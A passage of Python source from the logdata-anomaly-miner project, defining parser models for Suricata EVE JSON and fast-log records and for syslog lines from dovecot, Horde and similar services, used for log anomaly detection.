FixedDataModelElement("http_method_str", b'","http_method":"'), DelimitedDataModelElement("http_method", b'"'), FixedDataModelElement("protocol_str", b'","protocol":"'), DelimitedDataModelElement("protocol", b'"'), FixedDataModelElement("quote_str", b'"'), OptionalMatchModelElement( "status", SequenceModelElement("status", [ FixedDataModelElement("status_str", b',"status":'), DecimalIntegerValueModelElement("status"), ])), OptionalMatchModelElement( "redirect", SequenceModelElement("redirect", [ FixedDataModelElement("redirect_str", b',"redirect":"'), DelimitedDataModelElement("redirect", b'"'), FixedDataModelElement("quote_str", b'"') ])), FixedDataModelElement("length_str", b',"length":'), DecimalIntegerValueModelElement("length"), FixedDataModelElement("brack_str", b"}") ]) model = SequenceModelElement("model", [ FixedDataModelElement("time_str", b'{"timestamp":"'), DateTimeModelElement("time", b"%Y-%m-%dT%H:%M:%S.%f%z"), FixedDataModelElement("comma_str", b'",'), OptionalMatchModelElement( "flow_id", SequenceModelElement("flow_id", [ FixedDataModelElement("flow_id_str", b'"flow_id":'), DecimalIntegerValueModelElement("flow_id"), FixedDataModelElement("comma_str", b",")])), OptionalMatchModelElement( "in_iface", SequenceModelElement("in_iface", [ FixedDataModelElement("in_iface_str", b'"in_iface":"'), DelimitedDataModelElement("in_iface", b'"'), FixedDataModelElement("comma_str", b'",')])), FixedDataModelElement("event_type_str", b'"event_type":"'), FirstMatchModelElement("event_type", [ SequenceModelElement("dns", [ FixedDataModelElement("dns_str", b'dns",'), conn, SequenceModelElement("dns", [ FixedDataModelElement("type_str", b',"dns":{"type":"'), DelimitedDataModelElement("type", b'"'), FixedDataModelElement("id_str", b'","id":'), DecimalIntegerValueModelElement("id"), OptionalMatchModelElement( "rcode", SequenceModelElement("rcode", [ FixedDataModelElement("rcode_str", b',"rcode":"'), DelimitedDataModelElement("rcode", b'"'), 
FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("rrname_str", b',"rrname":"'), DelimitedDataModelElement("rrname", b'"'), OptionalMatchModelElement("rrtype", SequenceModelElement("rrtype", [ FixedDataModelElement("rrtype_str", b'","rrtype":"'), DelimitedDataModelElement("rrtype", b'"')])), FixedDataModelElement("quote", b'"'), OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id")])), OptionalMatchModelElement("ttl", SequenceModelElement("ttl", [ FixedDataModelElement("ttl_str", b',"ttl":'), DecimalIntegerValueModelElement("ttl")])), OptionalMatchModelElement( "rdata", SequenceModelElement("rdata", [ FixedDataModelElement("rdata_str", b',"rdata":"'), DelimitedDataModelElement("rdata", b'"'), FixedDataModelElement("quote_str", b'"')])), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("flow", [ FixedDataModelElement("flow_str", b'flow",'), conn, OptionalMatchModelElement( "app_proto", SequenceModelElement("app_proto", [ FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), OptionalMatchModelElement( "app_proto_tc", SequenceModelElement("app_proto_tc", [ FixedDataModelElement("app_proto_tc_str", b',"app_proto_tc":"'), DelimitedDataModelElement("app_proto_tc", b'"'), FixedDataModelElement("quote_str", b'"') ]) ), SequenceModelElement("flow", [ FixedDataModelElement("pkts_toserver_str", b',"flow":{"pkts_toserver":'), DecimalIntegerValueModelElement("pkts_toserver"), FixedDataModelElement("pkts_toclient_str", b',"pkts_toclient":'), DecimalIntegerValueModelElement("pkts_toclient"), FixedDataModelElement("bytes_toserver_str", b',"bytes_toserver":'), DecimalIntegerValueModelElement("bytes_toserver"), FixedDataModelElement("bytes_toclient_str", b',"bytes_toclient":'), DecimalIntegerValueModelElement("bytes_toclient"), 
FixedDataModelElement("start_str", b',"start":"'), DelimitedDataModelElement("start", b'"'), FixedDataModelElement("end_str", b'","end":"'), DelimitedDataModelElement("end", b'"'), FixedDataModelElement("age_str", b'","age":'), DecimalIntegerValueModelElement("age"), FixedDataModelElement("state_str", b',"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("reason_str", b'","reason":"'), DelimitedDataModelElement("reason", b'"'), FixedDataModelElement("alerted_str", b'","alerted":'), FixedWordlistDataModelElement("alerted", [b"true", b"false"]), FixedDataModelElement("brack_str1", b"}"), OptionalMatchModelElement( "tcp", SequenceModelElement("tcp", [ FixedDataModelElement("tcp_flags_str", b',"tcp":{"tcp_flags":"'), HexStringModelElement("tcp_flags"), FixedDataModelElement("tcp_flags_ts_str", b'","tcp_flags_ts":"'), HexStringModelElement("tcp_flags_ts"), FixedDataModelElement("tcp_flags_tc_str", b'","tcp_flags_tc":"'), HexStringModelElement("tcp_flags_tc"), OptionalMatchModelElement( "flags", SequenceModelElement("flags", [ FixedDataModelElement("syn_str", b'","syn":'), FixedWordlistDataModelElement("syn", [b"true", b"false"]), OptionalMatchModelElement( "fin", SequenceModelElement("fin", [ FixedDataModelElement("fin_str", b',"fin":'), FixedWordlistDataModelElement("fin", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "rst", SequenceModelElement("rst", [ FixedDataModelElement("rst_str", b',"rst":'), FixedWordlistDataModelElement("rst", [b"true", b"false"]), ]) ), OptionalMatchModelElement( "psh", SequenceModelElement("psh", [ FixedDataModelElement("psh_str", b',"psh":'), FixedWordlistDataModelElement("psh", [b"true", b"false"]), ]) ), FixedDataModelElement("ack_str", b',"ack":'), FixedWordlistDataModelElement("ack", [b"true", b"false"]), FixedDataModelElement("tcp_state_str", b',"state":"'), DelimitedDataModelElement("tcp_state", b'"'), ]) ), FixedDataModelElement("tcp_brack_str", b'"}'), ]) ), FixedDataModelElement("brack_str2", 
b"}") ]), ]), SequenceModelElement("http", [ FixedDataModelElement("http_str", b'http",'), conn, FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), http, FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'fileinfo",'), conn, http, FixedDataModelElement("app_proto_str", b',"app_proto":"'), DelimitedDataModelElement("app_proto", b'"'), SequenceModelElement("fileinfo", [ FixedDataModelElement("fileinfo_str", b'","fileinfo":{'), OptionalMatchModelElement( "filename", SequenceModelElement("filename", [ FixedDataModelElement("filename_str", b'"filename":"'), DelimitedDataModelElement("filename", b'"'), FixedDataModelElement("quote_str", b'",') ]) ), FixedDataModelElement("state_str", b'"state":"'), DelimitedDataModelElement("state", b'"'), FixedDataModelElement("stored_str", b'","stored":'), FixedWordlistDataModelElement("stored", [b"true", b"false"]), FixedDataModelElement("size_str", b',"size":'), DecimalIntegerValueModelElement("size"), FixedDataModelElement("tx_id_str", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), FixedDataModelElement("brack_str", b"}}") ]), ]), SequenceModelElement("stats", [ FixedDataModelElement("stats_str", b'stats",'), FixedDataModelElement("uptime_str", b'"stats":{"uptime":'), DecimalIntegerValueModelElement("uptime"), SequenceModelElement("capture", [ FixedDataModelElement("capture_str", b',"capture":{'), FixedDataModelElement("kernel_packets_str", b'"kernel_packets":'), DecimalIntegerValueModelElement("kernel_packets"), FixedDataModelElement("kernel_drops_str", b',"kernel_drops":'), DecimalIntegerValueModelElement("kernel_drops"), FixedDataModelElement("brack_str", b"}") ]), SequenceModelElement("decoder", [ FixedDataModelElement("pkts_str", b',"decoder":{"pkts":'), DecimalIntegerValueModelElement("pkts"), FixedDataModelElement("bytes_str", b',"bytes":'), DecimalIntegerValueModelElement("bytes"), 
FixedDataModelElement("invalid_str", b',"invalid":'), DecimalIntegerValueModelElement("invalid"), FixedDataModelElement("ipv4_str", b',"ipv4":'), DecimalIntegerValueModelElement("ipv4"), FixedDataModelElement("ipv6_str", b',"ipv6":'), DecimalIntegerValueModelElement("ipv6"), FixedDataModelElement("ethernet_str", b',"ethernet":'), DecimalIntegerValueModelElement("ethernet"), FixedDataModelElement("raw_str", b',"raw":'), DecimalIntegerValueModelElement("raw"), FixedDataModelElement("null_str", b',"null":'), DecimalIntegerValueModelElement("null"), FixedDataModelElement("sll_str", b',"sll":'), DecimalIntegerValueModelElement("sll"), FixedDataModelElement("tcp_str", b',"tcp":'), DecimalIntegerValueModelElement("tcp"), FixedDataModelElement("udp_str", b',"udp":'), DecimalIntegerValueModelElement("udp"), FixedDataModelElement("sctp_str", b',"sctp":'), DecimalIntegerValueModelElement("sctp"), FixedDataModelElement("icmpv4_str", b',"icmpv4":'), DecimalIntegerValueModelElement("icmpv4"), FixedDataModelElement("icmpv6_str", b',"icmpv6":'), DecimalIntegerValueModelElement("icmpv6"), FixedDataModelElement("ppp_str", b',"ppp":'), DecimalIntegerValueModelElement("ppp"), FixedDataModelElement("pppoe_str", b',"pppoe":'), DecimalIntegerValueModelElement("pppoe"), FixedDataModelElement("gre_str", b',"gre":'), DecimalIntegerValueModelElement("gre"), FixedDataModelElement("vlan_str", b',"vlan":'), DecimalIntegerValueModelElement("vlan"), FixedDataModelElement("vlan_qinq_str", b',"vlan_qinq":'), DecimalIntegerValueModelElement("vlan_qinq"), FixedDataModelElement("teredo_str", b',"teredo":'), DecimalIntegerValueModelElement("teredo"), FixedDataModelElement("ipv4_in_ipv6_str", b',"ipv4_in_ipv6":'), DecimalIntegerValueModelElement("ipv4_in_ipv6"), FixedDataModelElement("ipv6_in_ipv6_str", b',"ipv6_in_ipv6":'), DecimalIntegerValueModelElement("ipv6_in_ipv6"), FixedDataModelElement("mpls_str", b',"mpls":'), DecimalIntegerValueModelElement("mpls"), FixedDataModelElement("avg_pkt_size_str", 
b',"avg_pkt_size":'), DecimalIntegerValueModelElement("avg_pkt_size"), FixedDataModelElement("max_pkt_size_str", b',"max_pkt_size":'), DecimalIntegerValueModelElement("max_pkt_size"), FixedDataModelElement("erspan_str", b',"erspan":'), DecimalIntegerValueModelElement("erspan"), SequenceModelElement("ipraw", [ FixedDataModelElement("invalid_ip_version_str", b',"ipraw":{"invalid_ip_version":'), DecimalIntegerValueModelElement("invalid_ip_version"), ]), SequenceModelElement("ltnull", [ FixedDataModelElement("ipraw_pkt_too_small_str", b'},"ltnull":{"pkt_too_small":'), DecimalIntegerValueModelElement("ipraw_pkt_too_small"), FixedDataModelElement("unsupported_type", b',"unsupported_type":'), DecimalIntegerValueModelElement("unsupported_type"), ]), SequenceModelElement("dce", [ FixedDataModelElement("dce_pkt_too_small_str", b'},"dce":{"pkt_too_small":'), DecimalIntegerValueModelElement("dce_pkt_too_small"), FixedDataModelElement("brack_str", b"}") ]) ]), SequenceModelElement("flow", [ FixedDataModelElement("memcap_str", b'},"flow":{"memcap":'), DecimalIntegerValueModelElement("memcap"), FixedDataModelElement("spare_str", b',"spare":'), DecimalIntegerValueModelElement("spare"), FixedDataModelElement("emerg_mode_entered_str", b',"emerg_mode_entered":'), DecimalIntegerValueModelElement("emerg_mode_entered"), FixedDataModelElement("emerg_mode_over_str", b',"emerg_mode_over":'), DecimalIntegerValueModelElement("emerg_mode_over"), FixedDataModelElement("tcp_reuse_str", b',"tcp_reuse":'), DecimalIntegerValueModelElement("tcp_reuse"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), ]), SequenceModelElement("defrag", [ SequenceModelElement("ipv4", [ FixedDataModelElement("fragments_str", b'},"defrag":{"ipv4":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", 
b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), SequenceModelElement("ipv6", [ FixedDataModelElement("fragments_str", b'},"ipv6":{"fragments":'), DecimalIntegerValueModelElement("fragments"), FixedDataModelElement("reassembled_str", b',"reassembled":'), DecimalIntegerValueModelElement("reassembled_str"), FixedDataModelElement("timeouts_str", b',"timeouts":'), DecimalIntegerValueModelElement("timeouts"), ]), FixedDataModelElement("max_frag_hits_str", b'},"max_frag_hits":'), DecimalIntegerValueModelElement("max_frag_hits"), ]), SequenceModelElement("tcp", [ FixedDataModelElement("sessions_str", b'},"tcp":{"sessions":'), DecimalIntegerValueModelElement("sessions"), FixedDataModelElement("ssn_memcap_drop_str", b',"ssn_memcap_drop":'), DecimalIntegerValueModelElement("ssn_memcap_drop"), FixedDataModelElement("pseudo_str", b',"pseudo":'), DecimalIntegerValueModelElement("pseudo"), FixedDataModelElement("pseudo_failed_str", b',"pseudo_failed":'), DecimalIntegerValueModelElement("pseudo_failed"), FixedDataModelElement("invalid_checksum_str", b',"invalid_checksum":'), DecimalIntegerValueModelElement("invalid_checksum"), FixedDataModelElement("no_flow_str", b',"no_flow":'), DecimalIntegerValueModelElement("no_flow"), FixedDataModelElement("syn_str", b',"syn":'), DecimalIntegerValueModelElement("syn"), FixedDataModelElement("synack_str", b',"synack":'), DecimalIntegerValueModelElement("synack"), FixedDataModelElement("rst_str", b',"rst":'), DecimalIntegerValueModelElement("rst"), FixedDataModelElement("segment_memcap_drop_str", b',"segment_memcap_drop":'), DecimalIntegerValueModelElement("segment_memcap_drop"), FixedDataModelElement("stream_depth_reached_str", b',"stream_depth_reached":'), DecimalIntegerValueModelElement("stream_depth_reached"), FixedDataModelElement("reassembly_gap_str", b',"reassembly_gap":'), DecimalIntegerValueModelElement("reassembly_gap"), FixedDataModelElement("memuse_str", b',"memuse":'), DecimalIntegerValueModelElement("memuse"), 
FixedDataModelElement("reassembly_memuse_str", b',"reassembly_memuse":'), DecimalIntegerValueModelElement("reassembly_memuse"), ]), SequenceModelElement("detect", [ FixedDataModelElement("alert_str", b'},"detect":{"alert":'), DecimalIntegerValueModelElement("alert") ]), SequenceModelElement("app_layer", [ SequenceModelElement("flow", [ FixedDataModelElement("http_str", b'},"app_layer":{"flow":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("ftp_str", b',"ftp":'), DecimalIntegerValueModelElement("ftp"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), FixedDataModelElement("ssh_str", b',"ssh":'), DecimalIntegerValueModelElement("ssh"), FixedDataModelElement("imap_str", b',"imap":'), DecimalIntegerValueModelElement("imap"), FixedDataModelElement("msn_str", b',"msn":'), DecimalIntegerValueModelElement("msn"), FixedDataModelElement("smb_str", b',"smb":'), DecimalIntegerValueModelElement("smb"), FixedDataModelElement("dcerpc_tcp_str", b',"dcerpc_tcp":'), DecimalIntegerValueModelElement("dcerpc_tcp"), FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("failed_tcp_str", b',"failed_tcp":'), DecimalIntegerValueModelElement("failed_tcp"), FixedDataModelElement("dcerpc_udp_str", b',"dcerpc_udp":'), DecimalIntegerValueModelElement("dcerpc_udp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), FixedDataModelElement("failed_udp_str", b',"failed_udp":'), DecimalIntegerValueModelElement("failed_udp"), ]), SequenceModelElement("tx", [ FixedDataModelElement("http_str", b'},"tx":{"http":'), DecimalIntegerValueModelElement("http"), FixedDataModelElement("smtp_str", b',"smtp":'), DecimalIntegerValueModelElement("smtp"), FixedDataModelElement("tls_str", b',"tls":'), DecimalIntegerValueModelElement("tls"), 
FixedDataModelElement("dns_tcp_str", b',"dns_tcp":'), DecimalIntegerValueModelElement("dns_tcp"), FixedDataModelElement("dns_udp_str", b',"dns_udp":'), DecimalIntegerValueModelElement("dns_udp"), ]) ]), SequenceModelElement("flow_mgr", [ FixedDataModelElement("closed_pruned_str", b'}},"flow_mgr":{"closed_pruned":'), DecimalIntegerValueModelElement("closed_pruned"), FixedDataModelElement("new_pruned_str", b',"new_pruned":'), DecimalIntegerValueModelElement("new_pruned"), FixedDataModelElement("est_pruned_str", b',"est_pruned":'), DecimalIntegerValueModelElement("est_pruned"), FixedDataModelElement("bypassed_pruned_str", b',"bypassed_pruned":'), DecimalIntegerValueModelElement("bypassed_pruned"), FixedDataModelElement("flows_checked_str", b',"flows_checked":'), DecimalIntegerValueModelElement("flows_checked"), FixedDataModelElement("flows_notimeout_str", b',"flows_notimeout":'), DecimalIntegerValueModelElement("flows_notimeout"), FixedDataModelElement("flows_timeout_str", b',"flows_timeout":'), DecimalIntegerValueModelElement("flows_timeout"), FixedDataModelElement("flows_timeout_inuse_str", b',"flows_timeout_inuse":'), DecimalIntegerValueModelElement("flows_timeout_inuse"), FixedDataModelElement("flows_removed_str", b',"flows_removed":'), DecimalIntegerValueModelElement("flows_removed"), FixedDataModelElement("rows_checked_str", b',"rows_checked":'), DecimalIntegerValueModelElement("rows_checked"), FixedDataModelElement("rows_skipped_str", b',"rows_skipped":'), DecimalIntegerValueModelElement("rows_skipped"), FixedDataModelElement("rows_empty_str", b',"rows_empty":'), DecimalIntegerValueModelElement("rows_empty"), FixedDataModelElement("rows_busy_str", b',"rows_busy":'), DecimalIntegerValueModelElement("rows_busy"), FixedDataModelElement("rows_maxlen_str", b',"rows_maxlen":'), DecimalIntegerValueModelElement("rows_maxlen"), ]), SequenceModelElement("dns", [ FixedDataModelElement("memuse_str", b'},"dns":{"memuse":'), DecimalIntegerValueModelElement("memuse"), 
FixedDataModelElement("memcap_state_str", b',"memcap_state":'), DecimalIntegerValueModelElement("memcap_state"), FixedDataModelElement("memcap_global_str", b',"memcap_global":'), DecimalIntegerValueModelElement("memcap_global"), ]), SequenceModelElement("http", [ FixedDataModelElement("memuse_str", b'},"http":{"memuse":'), DecimalIntegerValueModelElement("memuse"), FixedDataModelElement("memcap_str", b',"memcap":'), DecimalIntegerValueModelElement("memcap"), ]), FixedDataModelElement("quote_str", b"}}}") ]), SequenceModelElement("tls", [ FixedDataModelElement("tls_str", b'tls",'), conn, SequenceModelElement("tls", [ FixedDataModelElement("subject_str", b',"tls":{"subject":"'), DelimitedDataModelElement("subject", b'"'), FixedDataModelElement("issuerdn_str", b'","issuerdn":"'), DelimitedDataModelElement("issuerdn", b'"'), FixedDataModelElement("fingerprint_str", b'","fingerprint":"'), DelimitedDataModelElement("fingerprint", b'"'), OptionalMatchModelElement( "sni", SequenceModelElement("sni", [ FixedDataModelElement("sni_str", b'","sni":"'), DelimitedDataModelElement("sni", b'"'), ]) ), FixedDataModelElement("version_str", b'","version":"'), DelimitedDataModelElement("version", b'"'), FixedDataModelElement("notbefore_str", b'","notbefore":"'), DelimitedDataModelElement("notbefore", b'"'), FixedDataModelElement("notafter_str", b'","notafter":"'), DelimitedDataModelElement("notafter", b'"'), ]), FixedDataModelElement("brack_str", b'"}}') ]), SequenceModelElement("alert", [ FixedDataModelElement("alert_str", b'alert",'), conn, OptionalMatchModelElement( "tx_id", SequenceModelElement("tx_id", [ FixedDataModelElement("tx_id", b',"tx_id":'), DecimalIntegerValueModelElement("tx_id"), ])), SequenceModelElement("alert", [ FixedDataModelElement("action_str", b',"alert":{"action":"'), DelimitedDataModelElement("action", b'"'), FixedDataModelElement("gid_str", b'","gid":'), DecimalIntegerValueModelElement("gid"), FixedDataModelElement("signature_id_str", b',"signature_id":'), 
DecimalIntegerValueModelElement("signature_id"), FixedDataModelElement("rev_str", b',"rev":'), DecimalIntegerValueModelElement("rev"), FixedDataModelElement("signature_str", b',"signature":"'), DelimitedDataModelElement("signature", b'"'), FixedDataModelElement("category_str", b'","category":"'), DelimitedDataModelElement("category", b'"'), FixedDataModelElement("severity_str", b'","severity":'), DecimalIntegerValueModelElement("severity"), FixedDataModelElement("brack_str", b"}") ]), http, FixedDataModelElement("brack_str", b"}") ]), ]) ]) return model SuricataFastParsingModel.py000066400000000000000000000035341437606560100336200ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds"""This module defines a generated parser model.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model to parse Suricata Fast logs from the AIT-LDS.""" model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%m/%d/%Y-%H:%M:%S.%f"), FixedDataModelElement("brack_str1", b" [**] ["), DecimalIntegerValueModelElement("id1"), FixedDataModelElement("sep1", b":"), DecimalIntegerValueModelElement("id2"), FixedDataModelElement("sep2", b":"), DecimalIntegerValueModelElement("id3"), FixedDataModelElement("sep3", b"] "), DelimitedDataModelElement("message", b" [**] "), FixedDataModelElement("classification_str", b" [**] [Classification: "), DelimitedDataModelElement("classification", b"]"), FixedDataModelElement("priority_str", b"] [Priority: "), DecimalIntegerValueModelElement("priority"), 
FixedDataModelElement("brack_str1", b"] {"), DelimitedDataModelElement("conn", b"}"), FixedDataModelElement("brack_str2", b"} "), IpAddressDataModelElement("src_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("src_port"), FixedDataModelElement("arrow_str", b" -> "), IpAddressDataModelElement("dst_ip"), FixedDataModelElement("colon", b":"), DecimalIntegerValueModelElement("dst_port"), ]) return model logdata-anomaly-miner-2.6.1/source/root/etc/aminer/conf-available/ait-lds/SyslogParsingModel.py000066400000000000000000001623711437606560100325730ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" user_info = SequenceModelElement("user_info", [ FixedDataModelElement("user_str", b"user=<"), OptionalMatchModelElement( "user", DelimitedDataModelElement("user", b">") ), FixedDataModelElement("method_str", b">"), 
OptionalMatchModelElement( "method", SequenceModelElement("method", [ FixedDataModelElement("method_str", b", method="), DelimitedDataModelElement("method", b","), ]) ), FixedDataModelElement("rip_str", b", rip="), IpAddressDataModelElement("rip"), FixedDataModelElement("lip_str", b", lip="), IpAddressDataModelElement("lip"), OptionalMatchModelElement( "mpid", SequenceModelElement("mpid", [ FixedDataModelElement("mpid_str", b", mpid="), DecimalIntegerValueModelElement("mpid"), ]) ), OptionalMatchModelElement( "secured", FixedDataModelElement("secured_str", b", secured") ), OptionalMatchModelElement( "tls", FixedDataModelElement("tls_str", b", TLS") ), OptionalMatchModelElement( "handshaking", SequenceModelElement("seq", [ FixedDataModelElement("handshaking_str", b" handshaking:"), DelimitedDataModelElement("msg", b", session=<") ]) ), FixedDataModelElement("session_str", b", session=<"), DelimitedDataModelElement("session", b">"), FixedDataModelElement("bracket_str", b">"), ]) model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%b %d %H:%M:%S", start_year=2020), FixedDataModelElement("sp1", b" "), DelimitedDataModelElement("host", b" "), FirstMatchModelElement("service", [ SequenceModelElement("dovecot", [ FixedDataModelElement("dovecot_str", b" dovecot: "), FirstMatchModelElement("imap", [ SequenceModelElement("imap", [ FixedDataModelElement("imap_str", b"imap("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket_str", b"): "), FirstMatchModelElement("message", [ SequenceModelElement("logout", [ FixedDataModelElement("logout_str", b"Logged out in="), DecimalIntegerValueModelElement("in"), FixedDataModelElement("out_str", b" out="), DecimalIntegerValueModelElement("out") ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Error: Failed to autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. 
["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), SequenceModelElement("err_open", [ FixedDataModelElement("err_str", b"Error: "), DelimitedDataModelElement("function_name", b"("), FixedDataModelElement("brack_str1", b"("), DelimitedDataModelElement("arg", b")"), FixedDataModelElement("failed_str", b") failed: Permission denied (euid="), DecimalIntegerValueModelElement("euid"), FixedDataModelElement("brack_str2", b"("), DelimitedDataModelElement("euid_user", b")"), FixedDataModelElement("egid_str", b") egid="), DecimalIntegerValueModelElement("egid"), FixedDataModelElement("brack_str3", b"("), DelimitedDataModelElement("egid_user", b")"), FixedDataModelElement("perm_str", b") missing +w perm: "), DelimitedDataModelElement("mail_path", b","), FixedDataModelElement("group_str", b", we're not in group "), DecimalIntegerValueModelElement("group_id"), FixedDataModelElement("brack_str4", b"("), DelimitedDataModelElement("group_name", b")"), FixedDataModelElement("owned_str", b"), dir owned by "), DelimitedDataModelElement("owner", b" "), FixedDataModelElement("mode_str", b" mode="), DelimitedDataModelElement("mode", b")"), FixedDataModelElement("brack_str5", b")"), OptionalMatchModelElement( "set", SequenceModelElement("set", [ FixedDataModelElement("set_str", b" (set"), DelimitedDataModelElement("param", b"="), FixedDataModelElement("equal_str", b"="), DelimitedDataModelElement("val", b")"), FixedDataModelElement("brack_str6", b")") ]) ) ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Failed to autocreate mailbox INBOX: Internal error occurred. " b"Refer to server log for more information. 
["), DelimitedDataModelElement("err_time", b"]"), FixedDataModelElement("brack", b"]") ]), ]), ]), SequenceModelElement("imap_login", [ FixedDataModelElement("imap_login_str", b"imap-login: "), FirstMatchModelElement("login", [ SequenceModelElement("disconnected_str", [ FixedDataModelElement("disconnected_str", b"Disconnected "), FirstMatchModelElement("auth", [ SequenceModelElement("auth_failed", [ FixedDataModelElement("auth_failed_str", b"(auth failed, "), DecimalIntegerValueModelElement("attempts"), FixedDataModelElement("attempts_str", b" attempts in "), ]), FixedDataModelElement("no_auth_str", b"(no auth attempts in "), FixedDataModelElement("no_auth_str", b"(disconnected before auth was ready, waited "), ]), DecimalIntegerValueModelElement("duration"), FixedDataModelElement("secs_str", b" secs): "), user_info ]), SequenceModelElement("login", [ FixedDataModelElement("login_str", b"Login: "), user_info ]), SequenceModelElement("anvil", [ FixedDataModelElement("anvil_str", b"Error: anvil:"), AnyByteDataModelElement("anvil_msg") ]), SequenceModelElement("auth_responding", [ FixedDataModelElement("auth_responding_str", b"Warning: Auth process not responding, " b"delayed sending initial response (greeting): "), user_info ]), ]), ]), SequenceModelElement("auth", [ FixedDataModelElement("auth_worker_str", b"auth: "), AnyByteDataModelElement("message") ]), SequenceModelElement("auth_worker", [ FixedDataModelElement("auth_worker_str", b"auth-worker("), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack", b"):"), AnyByteDataModelElement("message") ]), SequenceModelElement("master", [ FixedDataModelElement("master_str", b"master: "), AnyByteDataModelElement("message") ]), SequenceModelElement("ssl_params", [ FixedDataModelElement("ssl_params_str", b"ssl-params: "), AnyByteDataModelElement("message") ]), SequenceModelElement("log", [ FixedDataModelElement("log_str", b"log: "), AnyByteDataModelElement("message") ]), ]) ]), 
SequenceModelElement("dovecot2", [ FixedDataModelElement("dovecot_str", b" dovecot["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("bracket", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("warning", [ FixedDataModelElement("log_str", b"Warning: "), AnyByteDataModelElement("message") ]), ]) ]), SequenceModelElement("chfn", [ FixedDataModelElement("chfn_str", b" chfn["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FixedDataModelElement("change_user", b"changed user '"), DelimitedDataModelElement("user", b"'"), FixedDataModelElement("information_str", b"' information") ]), SequenceModelElement("horde", [ FixedDataModelElement("horde_str", b" HORDE: "), FirstMatchModelElement("horde", [ SequenceModelElement("imp", [ FixedDataModelElement("succ_str", b"[imp] "), FirstMatchModelElement("imp", [ SequenceModelElement("login", [ FixedDataModelElement("succ_str", b"Login success for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), DelimitedDataModelElement("ip", b")"), OptionalMatchModelElement( "fwd", SequenceModelElement( "seq", [ FixedDataModelElement("brack_str2", b") ("), DelimitedDataModelElement("forward", b")"), ]) ), FixedDataModelElement("to_str", b") to {"), DelimitedDataModelElement("imap_addr", b"}"), FixedDataModelElement("brack_str3", b"}"), ]), SequenceModelElement("message_sent", [ FixedDataModelElement("message_sent_str", b"Message sent to "), DelimitedDataModelElement('recepients', b' from'), FixedDataModelElement("from_str", b" from "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("brack_str2", b")"), ]), SequenceModelElement("login_failed", [ FixedDataModelElement("succ_str", b"FAILED LOGIN for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("brack_str1", b" ("), IpAddressDataModelElement("ip"), FixedDataModelElement("to_str", b") 
